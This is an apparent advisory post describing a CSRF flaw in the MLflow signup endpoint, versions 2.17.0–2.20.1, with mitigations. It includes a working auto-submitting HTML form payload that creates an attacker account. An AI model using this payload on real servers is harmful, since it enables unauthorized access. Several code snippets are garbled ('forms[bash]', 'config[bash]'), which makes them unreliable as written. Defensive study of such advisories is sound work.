A Cross-Site Request Forgery (CSRF) vulnerability in MLflow versions 2.17.0 to 2.20.1 allows attackers to exploit the Signup feature to create unauthorized accounts. This occurs due to insufficient validation of HTTP requests, enabling malicious actors to forge requests and execute actions on behalf of unsuspecting users. When a victim is tricked into visiting a malicious website, the site can send a forged request to the MLflow server, creating a new account without the victim’s consent. This account can then be used to perform unauthorized operations, potentially compromising the integrity of the MLflow instance.
DailyCVE Form:
Platform: MLflow
Version: 2.17.0 – 2.20.1
Vulnerability: CSRF in Signup
Severity: Moderate
Date: Mar 20, 2025
What Undercode Say:
Exploitation:
1. Crafting Malicious Payload:
Create a malicious HTML form that automatically submits a POST request to the MLflow Signup endpoint.
<form action="http://<mlflow-server>/signup" method="POST"> <input type="hidden" name="username" value="attacker" /> <input type="hidden" name="password" value="password123" /> </form> <script>document.forms[bash].submit();</script>
2. Triggering CSRF:
Trick a victim into visiting the malicious page. The form will automatically submit, creating an account controlled by the attacker.
3. Exploiting Unauthorized Access:
Use the newly created account to perform actions such as modifying MLflow experiments, deleting models, or accessing sensitive data.
Protection:
1. Implement CSRF Tokens:
Add CSRF tokens to all state-changing requests.
from flask_wtf.csrf import CSRFProtect csrf = CSRFProtect(app)
2. Validate Origin Headers:
Ensure requests originate from trusted domains by validating the `Origin` or `Referer` headers.
if request.headers.get('Origin') not in ALLOWED_ORIGINS:
abort(403)
3. Update MLflow:
Upgrade to MLflow version 2.20.2 or later, which includes patches for this vulnerability.
4. Use SameSite Cookies:
Configure cookies with the `SameSite` attribute to prevent cross-origin requests.
app.config[bash] = 'Strict'
5. Monitor Logs:
Regularly review server logs for suspicious account creation activities.
grep "POST /signup" /var/log/mlflow/access.log
6. Educate Users:
Train users to recognize phishing attempts and avoid clicking on untrusted links.
7. Deploy Web Application Firewall (WAF):
Use a WAF to block malicious requests targeting the Signup endpoint.
location /signup {
deny all;
}
By following these steps, organizations can mitigate the risk of CSRF attacks and secure their MLflow instances.
References:
Reported By: https://github.com/advisories/GHSA-969w-gqqr-g6j3
Extra Source Hub:
Undercode
